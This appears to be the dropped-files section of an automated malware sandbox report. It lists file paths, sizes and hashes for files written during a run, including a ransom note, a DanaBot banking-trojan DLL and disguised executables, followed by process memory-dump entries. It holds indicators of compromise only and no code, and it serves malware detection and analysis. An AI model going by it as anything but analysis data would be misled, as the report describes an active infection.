C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7jts25bp.default-release\cache2\entries\E8254BFA330D5945BAF042EF8F887002F85E1017

Filesize
63KB

MD5
9552bfcc5b7024e425474335fd23e9cf

SHA1
7e2e3e543453412a56a50c0374c603450f969613

SHA256
b4fb7a374e5a7b5340a0c23e440f9e3a1b30e78e3b1663e7adb1e838149218fa

SHA512
31642a203aa083778926cf274c5e063a755d852b8eeee7140d83371de49292c2ada0f9f1c3402e74af6e6942172bd71a9056663f51245c6f9f3d668183d81a6b

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7jts25bp.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

Filesize
7KB

MD5
c460716b62456449360b23cf5663f275

SHA1
06573a83d88286153066bae7062cc9300e567d92

SHA256
0ec0f16f92d876a9c1140d4c11e2b346a9292984d9a854360e54e99fdcd99cc0

SHA512
476bc3a333aace4c75d9a971ef202d5889561e10d237792ca89f8d379280262ce98cf3d4728460696f8d7ff429a508237764bf4a9ccb59fd615aee07bdcadf30

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab8CD7.tmp

Filesize
67KB

MD5
2d3dcf90f6c99f47e7593ea250c9e749

SHA1
51be82be4a272669983313565b4940d4b1385237

SHA256
8714e7be9f9b6de26673d9d09bd4c9f41b1b27ae10b1d56a7ad83abd7430ebd4

SHA512
9c11dd7d448ffebe2167acde37be77d42175edacf5aaf6fb31d3bdfe6bb1f63f5fdbc9a0a2125ed9d5ce0529b6b548818c8021532e1ea6b324717cc9bec0aaa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar90D4.tmp

Filesize
160KB

MD5
7186ad693b8ad9444401bd9bcd2217c2

SHA1
5c28ca10a650f6026b0df4737078fa4197f3bac1

SHA256
9a71fa0cb44aa51412b16a0bf83a275977ba4e807d022f78364338b99b3a3eed

SHA512
135be0e6370fd057762c56149526f46bf6a62fb65ef5b3b26ae01fa07b4c4e37188e203bd3812f31e260ec5cccff5924633dd55ab17e9fa106479783c2fb212b

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-PVK3E.tmp\revosetup.tmp

Filesize
1.3MB

MD5
7b77e7c3ebd213d95c4d909716f10030

SHA1
1c00eb97b4f154e209162bee83a84a6f1d1ef034

SHA256
a1bab1631135a982dfec6024b1ef8eb1ea2bce519cd832d9151e95e8def916d2

SHA512
fb6f95d42a936911b66861280cdeee77e2125c6b30141eb66daff402453d635a87a7f8ec9435ceb7ad4fddb473d6347a787bedb5649aa3abb234aceeeaaf8dcd

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
442KB

MD5
85430baed3398695717b0263807cf97c

SHA1
fffbee923cea216f50fce5d54219a188a5100f41

SHA256
a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e

SHA512
06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

Filesize
8.0MB

MD5
a01c5ecd6108350ae23d2cddf0e77c17

SHA1
c6ac28a2cd979f1f9a75d56271821d5ff665e2b6

SHA256
345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42

SHA512
b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

Filesize
59B

MD5
e0912d7512c482ad0572f34ec3fa16a0

SHA1
63079626cd8d76902c1f8f4bcb77fa02fbdb0602

SHA256
f5ce96a09a6ec040b5fa5e5b5ca68b10472da2cd04d2a611a6c980051125e14d

SHA512
2cdc9baf822496924385c7b884369549d87b579877b7b961ec122fe5b329f17b8bb1a503d0eb617c729d2de4819130f7f36d9d210e8cf3b2357314d26a36cc5b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

Filesize
76B

MD5
ce54a1e160bce04e12f576a8093ab158

SHA1
ac87b0b25df32c23fd0c3215b2dff7665943539d

SHA256
c7fd94cc9e5aef8a60d5eed0d8e7ccc8440783a8adcbfdba2827f48361bc28c8

SHA512
b3c96976122774529069806f19f96612d71fb18f726cd0096f3e292706e5d54b4d71c4fb677b3c57dc0733037b252ec6bc6c2a8904afe4c7dd5205531b02b5f0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
20KB

MD5
27273656ab62a44483b932c7d52b98fd

SHA1
854b345ece1a704253c74b272fb1ed25d00880e6

SHA256
ac0c71f1b98f7035d175589067314a0849e725d03b7a8419a3c196dd1c4faa35

SHA512
7ab3f21c382042e5a446b75a70cebf95e3f78cb1ba4bd6c342e6d5d3861a8ce031d9f33f29ec29e276a9ec7ecdf294576c2d14e9816891cdd23757b6c2b6eb62

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jts25bp.default-release\datareporting\glean\db\data.safe.bin

Filesize
2KB

MD5
b513785e6196c9e74b20fcee69d7d9eb

SHA1
3336749fef0a3f946c2ab0864df768198a33d6a0

SHA256
0d28180386095310144082637842e246244a157b535a2e17edd015128f4bb4ca

SHA512
e9d5efb199e17a72e59305fe300d37a2acfc38d9e6b7cfe6bb8566133adb49dc73120b4bc55decaa270872aaeb5c12f37f218a25aa64938609f38175e0ce60c7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jts25bp.default-release\datareporting\glean\events\events

Filesize
967B

MD5
6beb533fe664fb02e9e1ba9d95aefb4a

SHA1
60fe93cc2cf332ddea370aede2894c30e3e55076

SHA256
00c25bc28e37905904c568e466612c7c7312995dfcf3cda7a5fab142b766d2b8

SHA512
804b9fbae1045f0ec6b92db243965312001f301da88cc8b5045cd857bddd8a3ed49f675dd3ceea0b2c14e7c91dc6e31eefd19bef30437c80f0526c3d63480f66

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jts25bp.default-release\datareporting\glean\pending_pings\5950b688-ff1e-4b98-873a-634433f7a33c

Filesize
12KB

MD5
63962d4de3d9fb979136b64d8d97aad8

SHA1
954b4d9828feb5d9912dcfc5392f5e2ec4be80b2

SHA256
595c40f738b500f7dbe01840cad35c3cb2d388f21fddf4147ef35c9a3151d1bb

SHA512
c721394c8f7c6be48f19d0253792fa5bc943b5ca080ed724c43e57a022d911dbbe9b7f5274241c2d89d6667abefc5c3a326184e5f29207877d86f52fe1dfe1b0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jts25bp.default-release\datareporting\glean\pending_pings\d4f1fc50-2749-4e0f-b229-166196b75f88

Filesize
745B

MD5
93d8642b42fc6df7f52c6b55f4cb18b2

SHA1
265b85f2f2c0ffec837a4678a4849f8223f051bd

SHA256
925393064ace45c130e5d0ab588797deca3142adf6acac1d72c1eb9c53422fe6

SHA512
35f0155e921f5581d23a11f7b60502ead65f1ca1523925ab2d2eff879b37e4171e600985387c7d80a5ae6d752581c760773b200aaabadd0f05ea3b7d000e5609

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jts25bp.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

Filesize
997KB

MD5
fe3355639648c417e8307c6d051e3e37

SHA1
f54602d4b4778da21bc97c7238fc66aa68c8ee34

SHA256
1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e

SHA512
8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jts25bp.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

Filesize
116B

MD5
3d33cdc0b3d281e67dd52e14435dd04f

SHA1
4db88689282fd4f9e9e6ab95fcbb23df6e6485db

SHA256
f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b

SHA512
a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jts25bp.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

Filesize
479B

MD5
49ddb419d96dceb9069018535fb2e2fc

SHA1
62aa6fea895a8b68d468a015f6e6ab400d7a7ca6

SHA256
2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539

SHA512
48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jts25bp.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

Filesize
372B

MD5
8be33af717bb1b67fbd61c3f4b807e9e

SHA1
7cf17656d174d951957ff36810e874a134dd49e0

SHA256
e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd

SHA512
6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jts25bp.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

Filesize
11.8MB

MD5
33bf7b0439480effb9fb212efce87b13

SHA1
cee50f2745edc6dc291887b6075ca64d716f495a

SHA256
8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e

SHA512
d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jts25bp.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

Filesize
1KB

MD5
688bed3676d2104e7f17ae1cd2c59404

SHA1
952b2cdf783ac72fcb98338723e9afd38d47ad8e

SHA256
33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237

SHA512
7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jts25bp.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

Filesize
1KB

MD5
937326fead5fd401f6cca9118bd9ade9

SHA1
4526a57d4ae14ed29b37632c72aef3c408189d91

SHA256
68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81

SHA512
b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jts25bp.default-release\prefs-1.js

Filesize
6KB

MD5
171b66eb559f00a87b3c17002de6bedf

SHA1
8c98feca5f7bc998ae59bc0e90ddb7a858335f2f

SHA256
fa59b043b4f09d6ddf69786283ee557b262bd811cde50999fe85de633b269781

SHA512
cf19e6966205a8e8c471ab492d653871742305fe209362e0e378b94b47f680089f66682ba60e9b66f6f3f6207081e238e5fefb53190708192f4bdd255ba9620f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jts25bp.default-release\prefs.js

Filesize
7KB

MD5
42ca9951fba3f42cf138ccad3d32a1c6

SHA1
3f4dfbb32a997c8b5894a6dea555306eefa795bc

SHA256
fdc9083c9a48b26795cbac580c8b1ff632fcad186c74516466f35d7c4e7d0f13

SHA512
6ae66213f9fb0c41f7cf475d4ec622a82499a3e25ba30180cdb65a150e6898f9e0679fc854029d5deca16757a63f405922aa87891696ad75fe441c485705998b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jts25bp.default-release\prefs.js

Filesize
6KB

MD5
1ef9eb8efb8662b86150a4b26a6d80e6

SHA1
0c6dee919c33271235a7eba3b38c306b985ead37

SHA256
f9ffe82b1035aaeaabecfb850bb76656a5095fe1529764d8491d684189434bfa

SHA512
ec6609b2e6507dcc2262c5b9080f4e878118790304e54e15e425dddff79c87dac42fee6071538da4bf71d3166eb73aa8adb9d5d49427ad5d44daac63a1f656d0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jts25bp.default-release\prefs.js

Filesize
6KB

MD5
4a45e2f9c5eb399ad5094db4638efdef

SHA1
37149f1065df79952927b1acd99b736c7e2e2d3c

SHA256
be48dd9d177b41bb7bf020fb3863765e652150f3e8ada5ac607896778699a864

SHA512
010697e5d3949823fd3b9a05b0e158f6610e1a32cff191338ea5a96c57fc4019fecdc74527501b88445451bab7f73aad5145333485bc2ddcbe2af325144db59f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jts25bp.default-release\prefs.js

Filesize
6KB

MD5
0c016e9579b2f130cfdb7d8455ac278f

SHA1
22ac59db34098e5ead41f8e97121247ffba6fa92

SHA256
d92bd778cf06ba6590c0fdb919f60133bb992f17ce409b01d451a43c2714103a

SHA512
ed6f5a14e760f25ac3637e781f9d686617619e6c5d9a452f195dacfc24f656aebdaaf5738d1d8407f2b5524eb68b58a6558258670914e7fb04bba1a4342560d9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jts25bp.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
5KB

MD5
5c805508bcc74081e76c91c8a30c0873

SHA1
047e8522763a19912cd9c31d47111c9d098b85ef

SHA256
ee945828db3cf296d2562294ad102868da2ea487d256a4f8e6228a6d6270ccf1

SHA512
e091719b9cc0148fbbf9352cd380d6fec288f7a2cb8c07d805c78b053f2664e05ab98121ca8df36cdf5d92b174573daa7e51c42e545b342f42b3578e892ef60b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jts25bp.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
10KB

MD5
07d89be71f9810f68930d7bcc7f9ff11

SHA1
24bfd1d9fbfff1af18f8cdf302e9b1ae2948c936

SHA256
7ae346d201de4bc8dc6ea6db0f809a9ad0d9a758f68924aa0984d43ca69f9cd9

SHA512
7de7f962721d139e889d6443fc810c271124cdc14128ff95bf14b7b702752aa752113fff08355b312aa25d9fd8b776c13e00132acde072635b607c9f2b0e77e9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jts25bp.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
2KB

MD5
b8c86560444a8f4ced1a8bf369a6a162

SHA1
9ca5599e87a611e07b4ba1a828983466260f5016

SHA256
9dee1457b3f7095c97836c7ea845ef82a2b9b428d35c9951d86a164b049b72ab

SHA512
9045992616c98219a0171e37a21bbd7d61ce4637d73205c5fbd40e03d8ac511c6414c3739321fd02880f4b212950501e8904704d9edc423f4702e9e0a4546b85

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jts25bp.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
7KB

MD5
64cb1ba96f5b31f377501106492bcbcc

SHA1
f37f56f53059b751ececcb48524ccfeb13dde67b

SHA256
94846ca630c9a957f64d0f71b09e36bd754384833d876aebe368c94faee0c685

SHA512
1f8d770d742104b4bed5a58cf54223d098c84a82e4f288c43897b3370eebe3f681419ba2fdf4aa13524f0db3f0e856c796e167c255e3079bdf2fb5bcc71df093

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jts25bp.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
9KB

MD5
5b603847ba9cc99a98bc497d38e89152

SHA1
1a96682a10b7b3245d3abfbfbed68c98e8d7bc6a

SHA256
66b6272f44319a39e0617c4ec47105de3d98cebffd4d0bf082cb33b3fb79cd85

SHA512
35755aa55b05bb86a8ddc521f88f80b95972a562f89b3068669fcb1273bea317484338a592ecdea1b3fed66065407d92035810c90890bb134a99b5038bd02bc0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jts25bp.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
10KB

MD5
58912632cb85e0e5c01a5cc395aa2865

SHA1
59ba3ef587f6035ac48e895f5b7f65cb8ee7d618

SHA256
7bed35ee9711c43e900560104360eea0740cf718b2e9fed242ed6938c40dcf12

SHA512
3d2122c9e76c3725eac45ce2f7dfb2d76b2acd212792ab133952706f3de0401fc29c81d2764055f41c7a4732deaa2567145cf63daa3821c6e9e7e834b5ebd133

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jts25bp.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
10KB

MD5
13a1b10d1b17c51d6f1a5d9c62ddaf77

SHA1
3ed1cdcb6b10383be627effe3d4848493c1fbf00

SHA256
fdc529723485e2970491b48eca25a5b8bceb0412384d8e38970d1c40c8fe5579

SHA512
748ed59b3cbab2aaa98f5558a01d5ba449ddc5bd5c44bb3d6d5262fe981051e4b83daf989397f75d8840987d080efebfc68b73e25cff5bc6ce48b2a1e1f6c9bf

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jts25bp.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
10KB

MD5
114a387e5b5e4739d9e642441ff14549

SHA1
e4bb70ee1e25c81e4dc00149043ea87476fc08b5

SHA256
ebbc294b593599a764304dd95ca1699fa49dc410388b0f8a6297d10b7236ccee

SHA512
88ffa73f1bda6ee5310907ab1d03a2129134b165a3f1422b7feb4a8de7527a2510010d1a972e08a268c83e8b4833a3b75a378750fb89aa8701606c1038c46032

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jts25bp.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
10KB

MD5
992f67c10704deba36909d96678116fc

SHA1
7b85f2a3a54dd8ee4f5265cb3cc9878f8032e70f

SHA256
811730ced08268ca6f3c14bc239de3e775e25d8c6dae52acb0ea928c184d3df4

SHA512
cbff8b8b97d2787a8e0d75696bcfd1ee0526aeb24f0b8cfcd93d50327c94f8d6cc47459231012953e521581292ee16077d36a465b8672bfe506f768f91b39c86

Download Submit
C:\Users\Admin\AppData\Roaming\YOUR_FILES_ARE_ENCRYPTED.HTML

Filesize
4KB

MD5
6ce5b8de3bd03131f4eef25478d3c7a4

SHA1
8f89af39201e597c455de25a3934edbc4fa1cadb

SHA256
acbf5f641d38b75f2768d9f46dbd0af0084cf7d379b9d40529ab0bcc543c6345

SHA512
1afee3db3c731e47a7d39c05821feccc6a1ea2a381a125439832f0adaeddb89412170df5db8d69e667db7516e6f83106545df4be263d93416be2d856721d367e

Download Submit
C:\Users\Admin\Desktop\THE-MA~1\BANKIN~1\DanaBot.dll

Filesize
2.4MB

MD5
9cb7b0d8e817636deed7b195e69f6156

SHA1
3a68463ef2313fa9580ff8048900ffcafb604114

SHA256
9e9c58dec15cf26e295f6d4dc1587468e6f1483e78ff2b8a2f47034b9731f5b1

SHA512
c8cb93a387cbfe13d1cfd131cffdce95656543cbb8838983015c981aad5cb9e7a6c1bbf94f248a83017420d7d51eea2ab44449333dd1557e2ec2a7017fc8a793

Download Submit
C:\Windows\SysWOW64\PerfStringBackup.TMP

Filesize
4.7MB

MD5
c9349a62df0d7e7e97800408ae2baef1

SHA1
779c312ce8eada01ea0ceb5661333dfa843b2785

SHA256
5edfd4b70dc5e9ddc95b113f38dfcc8aaf8048decb3d7455e17f86343ef4cda9

SHA512
b9db136cc992cab510f24c263bbda7a56c9c1d60408c097811cc673ccd64b6d5778d69461629fc2e288ede432c66815c2cb318555a18f203f9cdce4916a94704

Download Submit
C:\Windows\SysWOW64\PerfStringBackup.TMP

Filesize
4.7MB

MD5
b0c3314e6e990cc289117773375f4f9c

SHA1
8ca8f3b59e7c286aec792dd7aba1178e41a2ebc6

SHA256
c8d54cbe84eaa9aee5154570e226fc24faa5f9165301f52a03d64092a3453d51

SHA512
d346804263a05accfbcb7d6c4942191e9433aa0765ee0f962042338cf5c91b2fc05d3adea17f388b31b918c297fd32d0a2056098db1a15e50242c2077ad95d2f

Download Submit
C:\Windows\SysWOW64\PerfStringBackup.TMP

Filesize
4.7MB

MD5
c286df1726e2550619592c913f040f70

SHA1
2c0e434f145b73efd2419eb69bab01244f4b008d

SHA256
550f94ddb6bc3260b2a2bd543d84b94998fb996984e7a286a646e544bf8e6197

SHA512
91486c5c78f548ecfe736e658f1093ba96185eb35dd9d7cf657d6b05421386f5141a7983dd5218f2f0f34f3ac386bcfb9f3b217685fe9ada6486ce28c4eeb52b

Download Submit
C:\Windows\caZaXCMtLUbqFGntBDgljfQhuTRLJdtODbKdFbcUnzZVGTtJMslKLzXhTSgtTqMVCskBpGVYsAUIrKphYRkWNKk.exe

Filesize
427KB

MD5
64218ac85566808ee404a3e2aced679c

SHA1
8ee5a75d89b03f07d3b51907815bbb425a69975d

SHA256
c8b59505e578d555976b6176732c1f19fd76860cf465cf1427e1dfa50622e067

SHA512
19680364e2caed60e68afdf73985fa49681ed6be9e7265a1aa3b5b6153644347269e609be643a9f77bd552d58d3fbfe860f6271905a57d100e33bf1f77091b1a

Download Submit
C:\Windows\inf\Outlook\0009\outlperf.ini

Filesize
2KB

MD5
509a7197ae66401d1da76f4bac1dd0a8

SHA1
a30f0cf0161addbdd3b04b482fef651ee4eae322

SHA256
ee9e288c3495fd548fd49095be08807f215fc0780064e179011098c0c7461a34

SHA512
4041c1073cb15ada49d284cf612a95502ce74ac1ef69fd1b9dfdf84eddd074150b6092c8534e49807ad3166f97127477e3497368ae845d369ebbfc2acfc6c071

Download Submit
C:\Windows\system\xanax.exe

Filesize
33KB

MD5
df24e1ccceb3c75dada950a1c1abca4d

SHA1
dc8120829a5593a3246d7bad126420282feaabca

SHA256
910c03d210381f0443bfcefe682717f28378dcfe5415071dd127a9837a97b0a6

SHA512
0df46654815eaeb13eca7e2bcd0fff6c62f34ddebe237dda41fc8dabfbf3512ceb12ef06a7c2bf9fcc52e0a4f87a886743b541d5b5b616eb9954e83892c429c7

Download Submit
\??\pipe\crashpad_2948_MGJXTXORBJSWXLXC

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\ProgramData\Windows\rutserv.exe

Filesize
1.7MB

MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
\ProgramData\Windows\winit.exe

Filesize
961KB

MD5
03a781bb33a21a742be31deb053221f3

SHA1
3951c17d7cadfc4450c40b05adeeb9df8d4fb578

SHA256
e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210

SHA512
010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45

Download Submit
\ProgramData\install\cheat.exe

Filesize
4.5MB

MD5
c097289ee1c20ac1fbddb21378f70410

SHA1
d16091bfb972d966130dc8d3a6c235f427410d7f

SHA256
b80857cd30e6ec64e470480aae3c90f513115163c74bb584fa27adf434075ab2

SHA512
46236dba79489272b6b7f9649fb8be5beb4a0b10776adf7b67ef3a9f969a977cde7a99b1b154b4b9142eb1bf72abcadbfd38abaef1eb88d7d03c646645517d0d

Download Submit
\Windows\SysWOW64\WIN280A.pif

Filesize
89KB

MD5
e79d0b1a342712ea9b96104086149d65

SHA1
a10177aafebb035e104eb22d30bdacb3894e0e1e

SHA256
e68ebecd17bb8e91079bd4fe9bd24059a2bc007b4baac477127eda7c5d5c6706

SHA512
f8cf1b773024784fe28f29af2200ad1d8f333b0dc251a1d39bef5a988c0c08c24328a6d9bbeea0370454c46c76835887f4792a55ec4f21608fa60b26977f27bf

Download Submit
memory/1080-3131-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/1080-2322-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/1080-10-0x0000000000400000-0x000000000044B000-memory.dmp

Filesize
300KB

Download
memory/1080-2866-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/1080-2-0x0000000000401000-0x0000000000412000-memory.dmp

Filesize
68KB

Download
memory/1080-1667-0x0000000000400000-0x000000000044B000-memory.dmp

Filesize
300KB

Download
memory/1080-0-0x0000000000400000-0x000000000044B000-memory.dmp

Filesize
300KB

Download
memory/2408-68-0x0000000000400000-0x0000000000551000-memory.dmp

Filesize
1.3MB

Download
memory/2408-8-0x0000000000400000-0x0000000000551000-memory.dmp

Filesize
1.3MB

Download
memory/2408-1665-0x0000000000400000-0x0000000000551000-memory.dmp

Filesize
1.3MB

Download
memory/2408-11-0x0000000000400000-0x0000000000551000-memory.dmp

Filesize
1.3MB

Download
memory/2568-1710-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2568-1691-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/3776-1835-0x00000000050E0000-0x00000000051E0000-memory.dmp

Filesize
1024KB

Download
memory/3776-1840-0x00000000050E0000-0x00000000051E0000-memory.dmp

Filesize
1024KB

Download
memory/3776-1711-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/3776-1839-0x00000000050E0000-0x00000000051E0000-memory.dmp

Filesize
1024KB

Download
memory/3776-1837-0x00000000050E0000-0x00000000051E0000-memory.dmp

Filesize
1024KB

Download
memory/3776-1853-0x00000000050E0000-0x00000000051E0000-memory.dmp

Filesize
1024KB

Download
memory/3776-1836-0x00000000050E0000-0x00000000051E0000-memory.dmp

Filesize
1024KB

Download
memory/3808-3247-0x0000000000370000-0x0000000000384000-memory.dmp

Filesize
80KB

Download
memory/3808-3319-0x00000000003D0000-0x00000000003D8000-memory.dmp

Filesize
32KB

Download
memory/3808-3321-0x0000000000480000-0x0000000000488000-memory.dmp

Filesize
32KB

Download
memory/4532-3055-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/4532-2546-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/4544-2106-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/4604-1862-0x0000000001F50000-0x0000000001F58000-memory.dmp

Filesize
32KB

Download
memory/4604-1861-0x000000001B640000-0x000000001B922000-memory.dmp

Filesize
2.9MB

Download
memory/4696-2076-0x0000000002340000-0x00000000025B8000-memory.dmp

Filesize
2.5MB

Download
memory/4696-2078-0x0000000000400000-0x0000000000AAD000-memory.dmp

Filesize
6.7MB

Download
memory/4748-2865-0x0000000000400000-0x0000000000415000-memory.dmp

Filesize
84KB

Download
memory/4748-2703-0x0000000000400000-0x0000000000415000-memory.dmp

Filesize
84KB

Download
memory/4756-2081-0x0000000002280000-0x00000000024EB000-memory.dmp

Filesize
2.4MB

Download
memory/4812-2086-0x0000000002080000-0x00000000022EB000-memory.dmp

Filesize
2.4MB

Download
memory/4812-2103-0x0000000002080000-0x00000000022EB000-memory.dmp

Filesize
2.4MB

Download
memory/4812-2095-0x0000000002080000-0x00000000022EB000-memory.dmp

Filesize
2.4MB

Download